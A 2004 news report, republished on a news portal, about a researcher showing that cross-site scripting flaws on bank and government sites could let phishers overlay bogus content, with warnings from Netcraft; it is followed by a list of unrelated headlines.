A new vulnerability makes it easier for fraudsters to pass off content from bogus websites as the real thing
Published:
21 July 2004 y., Wednesday
A new vulnerability makes it easier for fraudsters to pass off content from bogus websites as the real thing.
Using a variant of well-known cross site scripting attacks, British Web developer and security researcher Sam Greenhalgh was able to inject JavaScript from his own website into pages generated by NatWest, Mastercard and Barclays. Even the website of GCHQ, Britain's electronic eavesdropping operation, can be overlaid with bogus content, Greenhalgh shows.
Since the demo was first published late last month, MasterCard and Barclays have blocked the exploit route. This is just as well, as both have recently announced initiatives to combat phishing - apparently without ensuring that their own houses were in order. The continued vulnerability of other sites - such as NatWest's - is a cause for serious concern, because it could help fraudsters make their scams appear more plausible.
Security firm Netcraft warns: "Having the ability to run their code from the financial institution's own site is a big step forward for fraudsters, as it makes their attack much more plausible. It will almost certainly lead fraudsters to seek out banking sites vulnerable to cross site scripting as a refinement on current phishing attacks which depend upon obscuring the true location of a window prompting for bank account authentication details."
"The technique works equally well over SSL, and so offers fraudsters the enticing opportunity of having a phishing attack delivered over SSL with the attacker's code being served as part of a url from the bona fide bank's own secure server," it adds.
The attacks Greenhalgh demonstrates arise from well-documented cross site scripting security risks. Declaring a self interest, Netcraft advises companies to carry out more application testing. Other vendors promote digital certificates.
Šaltinis:
theregister.co.uk
Copying, publishing, announcing any information from the News.lt portal without written permission of News.lt editorial office is prohibited.
The most popular articles
Software company announced new structure_ of it_s business.
more »
It was reported that yesterday Canadian Sony Ericsson internet store was attacked
more »
Worldwide mobile communication device sales to end users totaled 427.8 million units in the first quarter of 2011, an increase of 19 percent from the first quarter of 2010, according to Gartner, Inc.
more »
At the Computer Human Interaction conference in B.C. this week, a team from Texas A&M University unveiled a touch screen technology they’ve been incubating for a couple of years that isn’t really a screen at all.
more »
A fully autonomous robot, Pneubron 7-11 has been created at the Hosoda Labs in Osaka University. The Pneubron robot was designed to find the link between human interactions and motor development.
more »
The ability to control objects simply by thinking about them is the subject of serious research in laboratories around the world with wheelchairs and even cars now being driven by the power of the mind. It's all very serious science, but in Japan, technologists are demonstrating that mind control can also be a lot of fun.
more »
Microsoft is planning on ramping up the amount of advertising free users of Skype see while they are making video calls and using the rest of the service.
more »
How certain was the U.S. Navy Seal team that it was Osama Bin Laden they shot, killed and buried at sea? According to a Florida company that makes biometric identification equipment, there's no doubt the Seals got their man.
more »
David Braben, the founder of Frontier Developments from Great Britain, has developed a small and very cheap computer "Raspberry Pi".
more »
Online music service Spotify is turning up the heat on Apple as it aims to create an alternative to iTunes.
more »
Kingston Queen's University specialists have developed the world's first prototype of flexible minicomputer.
more »